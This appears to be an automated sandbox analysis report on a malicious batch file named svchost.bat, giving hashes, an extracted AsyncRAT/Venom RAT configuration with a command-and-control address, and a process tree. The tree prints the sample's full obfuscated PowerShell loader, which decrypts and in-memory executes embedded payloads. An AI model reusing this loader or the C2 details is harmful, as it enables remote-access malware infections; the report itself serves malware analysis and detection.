Analysis
-
max time kernel
283s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
09-07-2024 21:36
Static task
static1
Behavioral task
behavioral1
Sample
svchost.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
svchost.bat
Resource
win10v2004-20240709-en
General
-
Target
svchost.bat
-
Size
396KB
-
MD5
8eeff7476b9e0d2c7b56538d7cc98e7a
-
SHA1
84991e8c34d6e9cefb7b5d8b79202d5fc5935396
-
SHA256
908fd49bd1d8751057fa509240b3dd3e161e9af3e1440d927d919c01eb949ad2
-
SHA512
174311a059e3b2bd16029a80e4b0bf007d0b31a54395f8a036c53e2905aaf4656c30c51a9dff4880bbc2b6bb3e0a237ad35e126367a00b456f3e426f58ddc919
-
SSDEEP
12288:71qhIV59Nm/Jzw5WwHdKkZGmgEI9oOC/zupA9csmX:7CIRNm/O5WwHdpZOEI9C6pAvW
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
147.185.221.20:49485
RANDOM-SHIT
-
delay
3
-
install
true
-
install_file
svchost.exe
-
install_folder
%AppData%
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3368 created 3092 3368 Explorer.EXE 50 -
Async RAT payload 1 IoCs
resource yara_rule behavioral1/memory/3684-83-0x0000020DDAF60000-0x0000020DDAF78000-memory.dmp family_asyncrat -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3368 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3684 powershell.exe Token: SeIncreaseQuotaPrivilege 3684 powershell.exe Token: SeSecurityPrivilege 3684 powershell.exe Token: SeTakeOwnershipPrivilege 3684 powershell.exe Token: SeLoadDriverPrivilege 3684 powershell.exe Token: SeSystemProfilePrivilege 3684 powershell.exe Token: SeSystemtimePrivilege 3684 powershell.exe Token: SeProfSingleProcessPrivilege 3684 powershell.exe Token: SeIncBasePriorityPrivilege 3684 powershell.exe Token: SeCreatePagefilePrivilege 3684 powershell.exe Token: SeBackupPrivilege 3684 powershell.exe Token: SeRestorePrivilege 3684 powershell.exe Token: SeShutdownPrivilege 3684 powershell.exe Token: SeDebugPrivilege 3684 powershell.exe Token: SeSystemEnvironmentPrivilege 3684 powershell.exe Token: SeRemoteShutdownPrivilege 3684 powershell.exe Token: SeUndockPrivilege 3684 powershell.exe Token: SeManageVolumePrivilege 3684 powershell.exe Token: 33 3684 powershell.exe Token: 34 3684 powershell.exe Token: 35 3684 powershell.exe Token: 36 3684 powershell.exe Token: SeIncreaseQuotaPrivilege 3684 powershell.exe Token: SeSecurityPrivilege 3684 powershell.exe Token: SeTakeOwnershipPrivilege 3684 powershell.exe Token: SeLoadDriverPrivilege 3684 powershell.exe Token: SeSystemProfilePrivilege 3684 powershell.exe Token: SeSystemtimePrivilege 3684 powershell.exe Token: SeProfSingleProcessPrivilege 3684 powershell.exe Token: SeIncBasePriorityPrivilege 3684 powershell.exe Token: SeCreatePagefilePrivilege 3684 powershell.exe Token: SeBackupPrivilege 3684 powershell.exe Token: SeRestorePrivilege 3684 powershell.exe Token: SeShutdownPrivilege 3684 powershell.exe Token: SeDebugPrivilege 3684 powershell.exe Token: SeSystemEnvironmentPrivilege 3684 powershell.exe Token: SeRemoteShutdownPrivilege 3684 powershell.exe Token: SeUndockPrivilege 3684 powershell.exe Token: SeManageVolumePrivilege 3684 powershell.exe Token: 33 3684 powershell.exe Token: 34 3684 powershell.exe Token: 35 3684 powershell.exe Token: 36 3684 powershell.exe Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeShutdownPrivilege 3368 Explorer.EXE -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1460 wrote to memory of 1252 1460 cmd.exe 74 PID 1460 wrote to memory of 1252 1460 cmd.exe 74 PID 1460 wrote to memory of 3684 1460 cmd.exe 75 PID 1460 wrote to memory of 3684 1460 cmd.exe 75 PID 3684 wrote to memory of 3368 3684 powershell.exe 54 PID 3368 wrote to memory of 2688 3368 Explorer.EXE 76 PID 3368 wrote to memory of 2688 3368 Explorer.EXE 76 PID 3368 wrote to memory of 2688 3368 Explorer.EXE 76 PID 3368 wrote to memory of 2688 3368 Explorer.EXE 76
Processes
-
c:\windows\system32\sihost.exesihost.exe1⤵PID:3092
-
C:\Windows\system32\openwith.exe"C:\Windows\system32\openwith.exe"2⤵PID:2688
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\svchost.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('n9ZmU5/PC5KtVx1quQV0tSXT3NElOxxx6q5t6hjaxWA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5OqvQAvAr9GTRWmouqMfEQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $qtKDW=New-Object System.IO.MemoryStream(,$param_var); $MgUrt=New-Object System.IO.MemoryStream; $FhzHj=New-Object System.IO.Compression.GZipStream($qtKDW, [IO.Compression.CompressionMode]::Decompress); $FhzHj.CopyTo($MgUrt); $FhzHj.Dispose(); $qtKDW.Dispose(); $MgUrt.Dispose(); $MgUrt.ToArray();}function execute_function($param_var,$param2_var){ $xZsKh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bIPsk=$xZsKh.EntryPoint; $bIPsk.Invoke($null, $param2_var);}$MDTVT = 'C:\Users\Admin\AppData\Local\Temp\svchost.bat';$host.UI.RawUI.WindowTitle = $MDTVT;$yugZz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MDTVT).Split([Environment]::NewLine);foreach ($pgATY in $yugZz) { if ($pgATY.StartsWith('qAbBQpLuRAqBaeIZIbhf')) { $UxrsW=$pgATY.Substring(20); break; }}$payloads_var=[string[]]$UxrsW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:1252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3684
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a